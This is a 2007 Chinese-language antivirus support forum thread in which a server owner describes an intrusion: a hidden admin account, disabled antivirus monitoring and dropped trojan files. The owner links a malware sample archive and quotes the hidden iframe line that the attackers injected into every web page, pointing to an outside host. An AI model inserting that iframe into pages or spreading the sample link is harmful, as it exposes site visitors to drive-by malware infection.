zselaine - 2007-11-22 15:44:00
最近我的服务器天天被攻击,刚才我刚好远程登录到服务器上,突然360安全卫士提示有个一文件正在装入,我装的是正版瑞星2008和防火墙,但这两个都无任何提示,我刚阻止完,就发现我的电脑用户加了一个叫"syslem$"的用户,然后我当然马上删除了,跟着,瑞星防火墙的监控就自动停止了,然后瑞星杀毒的监控伞也由绿色变成红色,我当然第一时间让它变回绿色,但没一会,又变成红色了,之后我又一次把它变回绿色,没一回,这次它由绿色变成黄色了,我再一次把它变成绿色,之后瑞星的两个监控就没有再变化了,后来我在C盘winnt/system发现了一堆文件,应该是刚才留下的,相信是木马,于是打包了,希望瑞星能帮帮我!我现在都不敢轻易离开服务器屏幕了……
文件大小为1.42M的RAR,在这个地址可以下载:http://www.dtchong.com/ad/ak47.rar
留下的文件如图:
附件:
96105720071122153252.jpg
zselaine - 2007-11-22 15:48:00
还有补充一下,每次被攻完,在我所有.htm .asp .aspx的源代码里面加上一堆<iframe src=http://www.e0shop.cn/k.htm width=50 height=1></iframe>,使我的网站无法完全正常
hotboy - 2007-11-22 16:15:00
怎么下载不了?
千寻旅 - 2007-11-22 16:20:00
把你的压缩包通过下边的地址提交瑞星
病毒上报:http://up.rising.com.cn/webmail/uploadnew.htm
立秋凉了 - 2007-11-22 22:35:00
楼主还是咨询一下瑞星客服或是瑞星在线专家门诊。
http://help.rising.com.cn/help/RSZX.html
两个铁球 - 2007-11-22 22:45:00
360提示,瑞新的都不提示!这下安全360又帮瑞星丰富了病毒库。
可瑞星从没见领情过,唉.............................................
ps:瑞新2008的主动防御、HIPS干嘛去了?睡觉去了?干嘛还叫冤家“360”来“多管闲事”?!
我爱吃橘子 - 2007-11-22 22:59:00
虽然不敢乱说,但至少现在还是没看到瑞星主动防御的表现.....
zselaine - 2007-11-23 9:19:00
我昨天在发完此帖后,系统彻底完了,昨天下午就去了电信,结果系统不停重启,连安全模式也进不了,唉……
脚本小猫 - 2007-12-13 9:31:00
我昨晚也遭受同样的攻击了,机房管理员打电话来说我的机器在发ARP欺骗包,可怜我水平有限,找了半天都找不到入侵所利用的漏洞。。。不知道楼主是如何解决的?现在只能暂时把服务器关了,可怜啊,希望有高手来指点一下。
脚本小猫 - 2007-12-13 17:14:00
顶啊。。。。。
Leoooo - 2007-12-13 17:26:00
楼主用的是瑞星2007还是瑞星2008?
fanghshim - 2007-12-14 21:44:00
没事到处看看了
© 2000 - 2026 Rising Corp. Ltd.